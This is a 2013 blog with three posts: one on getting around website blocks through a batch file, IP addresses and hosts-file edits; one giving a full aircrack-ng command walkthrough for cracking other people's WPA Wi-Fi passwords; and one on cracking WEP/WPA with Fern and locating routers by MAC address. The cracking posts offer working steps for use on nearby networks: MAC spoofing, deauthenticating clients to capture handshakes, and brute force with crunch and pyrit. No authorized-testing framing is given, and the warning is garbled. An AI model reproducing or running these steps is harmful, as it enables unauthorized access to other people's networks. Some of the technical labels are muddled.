Wednesday, March 13, 2013

unblock youtube

According to trap17.com this is how you access the internet:
1. Create a new text file that says: @start "" /b "C:\Program Files\Internet Explorer\iexplore.exe" %*
2. Rename the file "e.bat"
3. Copy this file to your profile folder
4. Open a command prompt window and type "e" followed by a URL of a website you want to go to. For example, if you wanted to go to Mahalo you would type (without the quotes): "e www.mahalo.com"
I haven't tried this myself, so hopefully it works.

To unblock websites try http://www.mathtunnel.com/ apparently at this site you can just type in the url of any website you want to unlock. No command prompt necessary.
Or you can try these two command prompt tricks from http://revision3.com/forum/showthread.php?t=4885
Trick 1: (In this example www.mahalo.com stands for the url of the website you want to unblock.)
1. Open the command prompt
2. Type: ping www.mahalo.com
3. Copy the IP next to "Reply From"
4. Paste the IP into your address bar.

Trick 2: (In this example www.mahalo.com stands for the url of the website you want to unblock.)
1. Open command prompt and notepad.
2. Write "ping localhost" without the "" into the command prompt.
3. Copy the IP into the notepad file, hit tab and write localhost
4. In the command prompt write: ping www.mahalo.com
5- Copy the IP of the site into the notepad file, hit tab and write the link to the site, without http://, as in "www.google.com"
6- Hit enter and repeat step 5, should look like this
00.00.0.00 localhost
000.000.00.00 www.website.com
000.000.00.00 www.website.com

7. Save the notepad file into your desktop as "host."
8. Go to My Computer>Your Hardrive>WINDOWS>system32>drivers>ect and drag the notepad file into that folder.

Just in case those tips don't work, I also found you a couple video tutorials:
YouTube: Unblock that blocked site!

Access blocked sites

1. Increase the size of your browser cache. If the static parts of a site (like background graphics, CSS, etc) are stored in the local cache, your browser can safely skip downloading these files when you re-visit the site in future thus improving speed.

2. Turn off web images, the Adobe Flash plug-in, Java Applets and JavaScript from your browser settings as these files are often the bulkiest elements of any web page.

3. The Google Transcoder service at google.com/gwt/n can split large web pages into smaller chunks that will download more quickly on your computer.

4.Monitor your Internet speed to determine hours when you get the maximum download speed from the ISP. Maybe you can then change your surfing schedule a bit and browse more during these "off peak" hours.

5. Finch can serve a light-weight version of any website in real-time that is free of all bells and whistles. For instance, the New York Times homepage with all external resources can weigh more than a MB but Finch trims down the size by 90% so the site loads more quickly on a slow web connection.

6. Flinch (mentioned at #4) is good for reading regular websites but if you just need to check the latest articles published on your favorite blogs, use BareSite. This service will automatically detect the associated feed of a website and render content quickly inside a minimalist interface.


7.You can use a text browser like Lynx or Elinks for even faster browsing. It downloads only the HTML version of web pages thus reducing the overall bandwidth required to render websites.

8. When searching for web pages on Google, you can click the "Cache" link to view the text version of a web page stored in the Google Cache. Alternatively, install this GM script as it adds a "cached text only" link near every "Cached" link on Google Search pages.

9. Move your web activities offline as far as possible. You can send & receive emails, write blogs and even read feeds in an offline environment.

10. Applying the same logic, you may also consider using tools like Web In Mail or Email The Web as they help you browse websites via email. Just put the URL of a page (e.g., cnn.com) in the subject field of your email message and these services will send you the actual page in the reply.

11. Bookmarklets are like shortcuts to your favorite web services. You neither have to open the Gmail Inbox for composing a new email message nor do you have to visit Google Translate for translating a paragraph of text. Add relevant bookmarklets to your browser bar and reduce the number of steps required to accomplish a task.

12. Use the netstat command to determine processes, other than web browsers, that may be secretly connecting to Internet in the background. Some of these processes could be consuming precious bandwidth but you can block them using the Firewall.

13. Use URL Snooper to determine non-essential host names that a website is trying to connect while downloading a web page. You may block them in future via the Adblock Plus to filter out advertising banners on web pages.

14. If you don’t want to spoil your web surfing experience by stripping images and other graphic elements from a web page, get Opera Turbo. It will first fetch the requested web page on to its own server and then send it to your machine in a compressed format. Opera Turbo won’t change the layout of a web site but can lower the image resolution so that they load faster on slow Internet.

Source:-labnol

Thursday, March 7, 2013

HACK WIFI PASSWORD WITH BACKTRACK 5

"WARNING:Don't Hack any authorized router,otherwise you'll be put into jail."
 
Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads/
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

 Steps to Follow:
Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download
crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the
wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.
THANKS YOU AND plz follow me in blog.............


Saturday, March 2, 2013

Hack WEP encrypted websites

I am going to discuss the use of a tool named as FERN WIFI CRACKER using which in general you can hack WEP as well as WPA secured WIFI networks and this GUI based application is quite easy to use plus, it cracks password in quite fast time if you have a good computer with fast RAM and processor. In backtrack 5 its already installed an is properly configured but you can get it on Ubuntu and other Linux flavours also. Read this post to learn how to setup FERN for Ubuntu.Setting Up and Running Fern WIFI Cracker In Ubuntu What this application uses has been listed in the post. After installing Fern in any linux or else you can also use backtrack 5 for this purpose. Read here how to install backtrack 5 :- and Install Backtrack 5 as dual boot (Windows and Bt5 Together). Whatever OS you are going to use just run Fern and read below.
Using Fern Wifi Cracker:-

Click the refresh button to load monitor interfaces. Then hit scan button, its for dual functioning mean, at first hit it will start scanning and again if you hit it it will stop scanning.

Fern Wifi Cracker

When any WIFI network with WEP and WPA will be found by FERN it will be displayed as in this below screen shot. You have to hit button of WPA or else WEP inorder to crack the password for any of the WIFI network.

WEP and WPA scan FERN

Cracking WEP encryption based WIFI password key:-

After hitting the activation button of the WEP attack. What happens can be seen in screen shots below:-

So, key has been successfully recovered.
Cracking WPA encryption based WIFI password key:-

Cracking WPA encryption based WIFI password

So, key has been successfully recovered, as you can see.
Where the keys database can be found later?
All the keys which are recovered are automatically saved here:- /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db. Plus you can also add keys manually.

Fern Key database

Tracking provider of WIFI Router's location using Mac Address:-
Here is the geographical location mac addres tracker. You can run it from :- ToolBox>Geolocatory Tracker

Fern Mac Tracer

- See more at: http://www.hackersthirst.com/2011/08/hackingcracking-wpawep-encrypted-wifi.html#sthash.JeQQoOdS.dpuf